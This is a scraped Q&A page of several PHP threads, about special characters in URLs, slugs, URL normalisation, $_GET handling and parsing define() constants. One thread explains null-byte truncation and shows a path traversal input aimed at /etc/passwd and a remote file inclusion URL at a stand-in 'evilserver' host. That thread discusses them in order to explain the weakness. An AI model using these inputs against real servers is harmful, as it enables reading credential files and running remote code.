Special characters in CakePHP URL - php

I'm developing a web application where users have profiles, and skills related to that profile. I want to develop a page where a user can see all profiles that correspond to a particular skill. For example, if I wanted to see all users with the skill of "HTML" I could use http://site.com/skills/HTML. Pretty simple.
I've got it working, however some users have skills with spaces (for example project management) and some have special characters (for example C#). When I browse to a URL like http://site.com/skills/C#, Cake automatically makes it http://site.com/skills/C because it parses out the special character (# in this case).
How can I safely allow skills in the URL that have special characters in them? This is the action I'm currently using:
public function view($name) {
// Find skill using $name
$skill = $this->Skill->find('first', array(
'conditions' => array('Skill.name' => $name)
));
if(!$skill) {
// Skill doesn't exist, return 404
// TODO: route to 404 page
throw new NotFoundException();
}
$this->set('skill', $skill);
}

The # is a "special" character that by default jumps to a named anchor. In order to use special characters in an URL, you will need to use urlencode().
But please note that your URL's will not look "fancy", it will just be encoded to the raw HTML entity of the special character. In your case C# will become C%23. So you might want to consider using a different URL alias for your tag, like CSharp (you can just set a "background" database field to "translate" the original value to an URL-friendly one).

Related

Which special characters can cause a file path to be misinterpreted?

For example, there is function (pseudo code):
if ($_GET['path'] ENDS with .mp3 extension) { read($_GET['path']); }
but is it possible, that hacker in a some way, used a special symbol/method, i.e.:
path=file.php^example.mp3
or
path=file.php+example.mp3
or etc...
if something such symbol exists in php, as after that symbol, everything was ignored, and PHP tried to open file.php..
p.s. DONT POST ANSWERS about PROTECTION! I NEED TO KNOW IF THIS CODE can be bypassed, as I AM TO REPORT MANY SCRIPTS for this issue (if this is really an issue).
if something such symbol exists in php, as after that symbol, everything was ignored, and PHP tried to open file.php..
Yes, such a symbol exists; it is called the 'null byte' ("\0").
Because in C (the language used to write the PHP engine) the end of a 'string' is signalled by the null byte. So, whenever a null byte is encountered, the string will end.
If you want the string to end with .mp3 you should manually append it.
Having said that, it is, generally speaking, a very bad idea to accept a user supplied path from a security standpoint (and I believe you are interested in the security aspect of this, because you originally posted this question on security.SE).
Consider the situation where:
$_GET['path'] = "../../../../../etc/passwd\0";
or a variation on this theme.
The leading concept in programming is "Don't trust user input". So the main problem in your case is not a special character its how you work with your data. So you shouldn't use a path given by a user because the user can manipulate the path or other variables.
To escape a user input to prevent bad characters you can use htmlspecialchars or you can filter your get input with filter_input something like that:
$search_html = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
WE CAN'T TELL IF YOU IF THE CODE CAN BE "BYPASSED" BECAUSE YOU'VE NOT GIVEN US ANY PHP CODE
As to the question of whether its possible to trick PHP into processing a file it shouldn't based on the end of the string, then the answer is only if there is another file somewhere else which has the same ending. However, by default, PHP will happily read from URLs using the same functionality as reading from local files, consider:
http://yourserver.com/yourscript.php?path=http%3A%2F%2Fevilserver.com%2Fpwnd_php.txt%3Ffake_end%3Dmp3

slugging friendly urls in php

I have a problem concerning php,mysql, apache's mod_rewrite and a slug function for friendly urls.
I have a table in mysql with series.
This table has an auto_increment ID and an unique_key string that is the name of the serie.
What I want to do is:
The user could write something like series/name-of-a-serie (because I would prefer to use the unique string more than IDs in this case), and I would get something like series.php?serieName=name-of-a-serie but the name I have in the database is "name of a serie"
then I was thinking about revert the slugged string to take back the original... but then I have other problem:
If I have a function that replace white spaces with hyphens, I would have problems with, for example, the string "this - name",because if I revert the process, I would get "this name" and that's not the original name.
Any ideas?
Thanks id advance and sorry because i'm not english and I can't express myself as well as I would like.
You could always use a second column in your database where you store the already clean up version of the series name, like removing all special characters, substitute spaces with dashes and so on.
When using that link, you just have to check the database for that prepared text and get the real entry.
As far as i know wordpress does is exactly this way. They store a url-friendly post_name with every post that you can use.
By passing all urls through a script (via .htaccess) they can check for all those variants and show the corresponding pages.
Please see How to rewrite urls in wordpress for some details.
some code to clean up your titles might be like:
// Define all the characters you want to get rid of / replace
$arrBadChars = array('Ä', 'Ö', 'Ü', 'ä', 'ö', 'ü', 'ß', ' ', '_', '~', '-/', chr(10), chr(13));
// define the corresponding characters/texts for the above ones
$arrGoodChars = array ('ae', 'oe', 'ue', 'ae', 'oe', 'ue', 'ss', '-', '', '/', '', '','');
// Replace the bad with the good ones
$strNewTitle = str_replace($arrBadChars, $arrGoodChars, html_entity_decode($strTitle));
// simply paranoia, to remove everything else you might not have thought of above...
$strNewTitle = preg_replace('#[^[:space:]~a-zA-Z0-9_-]#', '', $strNewTitle);
the $strNewTitle is the one you could save and use for your URL.
If you are sure that you won't have any - in the Database Title, simply do that:
$id=str_replace("-"," ",$_GET['id']);
$stm=$db->prepare("SELECT * FROM movie WHERE movie_title=:movie");
$result=$stm->execute(array(":movie"=>$id))->fetchAll();
You can also use any other replacement character, like _ in the URL.
This way you can keep friendly URLs but also maintain your Database Titles. Another way which I have seen sometimes is to create a second database field which stores the URL.
The solution to this problem is to use numeric identifers in the URL. You said the table already has been implemented this way, so it is easy to do. The basic concept is to extract the numeric id from the url, and then verify that the slug is equal to the slug in your database. If not, then redirect to the correct one (301). This is the most popular pattern that I've recognized.
Your URL will look like this:
http://example.com/12345/name-of-a-serie
However you get that ID is up to you, but mod_rewrite, will work.
$id = $_GET['id'];
$slug = $_GET['slug'];
// verify the id
$record = getRecord($id);
if(! $record) exit;
if($record->slug != $slug) {
$slug = $record->slug;
// these values are NOT arbitary, because we have validated the record
// against the arbitrary ID first, so we're safe. as long as your
// internal API is using prepared statements.
header("Location: /$id/$slug");
exit;
}
If you want to revert from a slugged string back to the original string, you have to ensure that the slugging function is bijective, then write the reverse function.
BTW, slugging functions can't be bijective since they map an extended charset (the one of your language) to a restricted charset (the one used in urls).
Hopefully, if the slug has a UNIQUE constraint in your table, you can use it in your PHP code as a key to retrieve your item, thus its name.
Thank you very much.
I have now an idea of what I could do.
Every time I Insert a new tittle in DB, I would check the original name.
If there is already an entry, then that means that this movie has already in the DB,
If not, I would insert the original tittle and the slugged one.
In the case that "A serie" and "A-serie" were a completely different series but the slugged tittle were the same
"A serie" -> "A-serie"
"A-serie" -> "A-serie"
then I would only have to change the slugged tittle, something like:
ID | original name | slugged name
----------------------------------------------
201 | A name | a-name
----------------------------------------------
202 | A-name | a-name1
Being the slugged name the one that the user would write in the URL.
The URLs would be something like:
series/a-serie
series/a-serie1

Display if URL matches database characters

Let me first give you a little background to explain what I'm trying to do. My websites use URL's that look like this: MySite/World/Isthmus_of_Panama
I'm working on a major upgrade (and may eventually upgrade further by switching to a CMS, like Drupal or WordPress), and it sounds like the general consensus is that URL's with hyphens are better than underscores. So I'm changing my URL's to MySite/World/Isthmus-of-Panama. In the meantime, I'm also trying to figure out if I should change my URL's to all lower case, and what about special symbols like accents or parentheses?
And what if someone typed in a URL that looks like MySite/World/Isthmus of Panama ? Wikipedia has a script that automatically converts the spaces to underscores. It will also default to the correct URL if you use the wrong case.
Of course, if I change my URL's, I'll also have to forward visitors from my old URL's. It's getting very confusing.
Then I realized that I could cover all of the bases with a script that accepts any URL that matches the characters in my database, 1) regardless of case, 2) and regardless of whether multiple words are separated by hyphens, underscores, spaces or %20. So imagine the following URL's:
MySite/World/Isthmus-of-Panama
MySite/World/Isthmus of Panama
MySite/World/Isthums%20of%20Panama
MySite/World/isthumus_of_panama
MySite/World/Isthmus-of_PANAMA
Where the database value is Isthmus-of-Panama.
Below is one of my queries, where $MyURL = the database value URL (e.g. Isthmus-of-Panama). Can anyone tell me how to modify it so that all of the above URL's will be accepted, with the page then defaulting to the database value?
Wikipedia has a similar feature. If you go to their article about Crazy Horse, then replace the URL Crazy_Horse with crazy_horse or Crazy Horse, it will default to Crazy_Horse. Thanks.
$sql= "SELECT COUNT(URL) AS num FROM gs_reference
WHERE URL = :MyURL";
$stmt = $pdo->prepare($sql);
$stmt->bindParam(':MyURL',$MyURL,PDO::PARAM_STR);
$stmt->execute();
$Total = $stmt->fetch();
switch($Total['num'])
{
case 1:
// DISPLAY A PAGE
break;
case 0:
// 404 NOT FOUND ERROR
break;
default:
// DUPLICATE RESULTS
break;
}
I would convert input, example Isthums%20of%20Panama, to the database value in php.
If the converted value is equal to the input one then don't do a 301 redirect to the url with the converted text else do one
EDIT
I would create in database a column slug (generally called like this) which contain the text normalized (ascii character and -) and create an unique index on it
You could use this function to generate the slug in php: PHP function to make slug (URL string)

Retrieving Multiple Words using PHP's $_GET function

I have a site that offers a keyword search. The user can perform a search by either selecting from a set of pre-defined keywords displayed as hyperlinks or utilize a search form on the same page.
When the user searches for Russian Blue Cat, the following is added to the page URL:
If using the pre-defined hyperlink search term, then ?keywords=Russian%20Blue%20Cat is added to the URL as follows:
http://mydomain.com/index.php?keywords=Russian%20Blue%20Cat
If using the search form, then ?keywords=Russian+Blue+Cat is added to the URL as follows:
http://mydomain.com/index.php?keywords=russian+blue+cat
The following $_GET line of code is placed within two PHP files, the original index.php file that contain both the pre-defined hyperlink search terms and the search form and another PHP file called process.php that utilizes the keywords for another process.
if(empty($_GET['keywords'])){$keywords = '';} else {$keywords = $_GET['keywords'];}
The above $_GET line of code contained within the index.php file works properly and retrieves all three keywords. In this case the words Russian Blue Cat is retrieved.
The above $_GET line of code contained within the process.php file does not work properly and only retrieves the first of the three keywords. In this case only the word Russian is retrieved.
Is there a simple or proper way to fix this such that all keywords are retrieved properly?
Thank you in advance.
Check for the string '%20' and if present, explode by '%20'. Otherwise, check for the presence of a plus sign and explode by it instead.
This method is agnostic of the differing input format from the two sources entering the same script.
The caveat is that the string '%20' or the character '+' cannot occur inside a word in the other format or you will get unusual behavior.
$keyword = array();
if(stripos($keywords,"%20")) {
$keyword = explode("%20",$keywords);
}
else if(stripos($keywords,"+")) {
$keyword = explode("+",$keywords);
}
'$keyword' will then contain your keywords in an array.

Read name and value from every define('NAME','VALUE'); inside a .php file

I'm implementing a php interface to process a .php file containing a bunch of define sentences defining constants with text values to translate by somebody.
The input is parsed sentence by sentence and shown in the interface to the translator who will input the translation in a html textarea and send it to the server
By the end of the process an output file would be generated, identical to the input .php file, only with the define values translated.
E.g. processing an input file 'eng.php' like this:
<?php
define ("SENTENCE_1", "A sentence to translate");
?>
would give the translated output file 'spa.php' like this:
<?php
define ("SENTENCE_1", "The same sentence translated to spanish");
?>
For this I would like to know:
What is the best way to parse the input file to get the constant names and values in an array? (Something like $var[0]['name'] would be "SENTENCE_1" and $var[0]['value'] would be "A sentence to translate")
Would it be possible to get the translation from google translator shown in the input textarea as a suggestion to edit for the person who is translating it? How? (I read google translator api v1 is no longer available and v2 is only available as a paid service. Are there any free alternatives?)
http://php.net/manual/es/function.get-defined-constants.php
What about that?
get_defined_constants doesn't give you exactly the structure you asked for, but it should be sufficient.
define('MY_CONSTANT', 'something');
define('MY_CONSTANT_2', 'another');
$constants = get_defined_constants(true);
$constants = $constants['user'];
print_r($constants);
/**
* array(
* 'MY_CONSTANT' => 'something',
* 'MY_CONSTANT_2' => 'another'
* )
*/
Note that this will be all constants defined in the current scope, which in PHP is gonna be anything defined this request.
Use get_defined_constants() to get the list of all the defined constants.
To get userdefined constant specially
$allconstants = get_defined_constants(true);
print_r($allconstants['user']);
In case anybody needs to read constants' names and values defined in a given .php file into an array of variables without actually defining those constants (E.g. if some different constant with the same name was previously defined, thus giving an error when processing the file with include or require), here is how I did it (Warning: I haven't had any trouble yet, but it's not thoroughly tested, so it can be buggy).
if (file_exists($filename)){
$outf=fopen($filename,'r');
while (($line=fgets($outf))!==false){
if (strpos($line, 'define')!==false){
$parts=explode("\"",implode("\"",explode("'",implode("\\q",explode("\\\"",implode("\\s",explode("\\'",$line)))))));
$name=implode("\\'",explode("\\s",implode("\\\"",explode("\\q",$parts[1]))));
$value=implode("\\'",explode("\\s",implode("\\\"",explode("\\q",$parts[3]))));
$outconstants[$name]=$value;
}
}
}
You can see I assume there's no more than 1 define sentence per line, and that the names and values of the constants are specified as string values using PHP notation (between single (') or double (") quotes.)
Also, escaped quotes (\" or \') are temporarily escaped as \q (\") or \s (\') instead, to properly match the non-escaped ones, and then escaped back as usual once what's in between the non escaped ones is assigned to $name and $value.
The google api problem was solved using microsoft translation api instead (free up to 2.000.000 chars/month): http://msdn.microsoft.com/en-us/library/ff512421.aspx#phpexample

Categories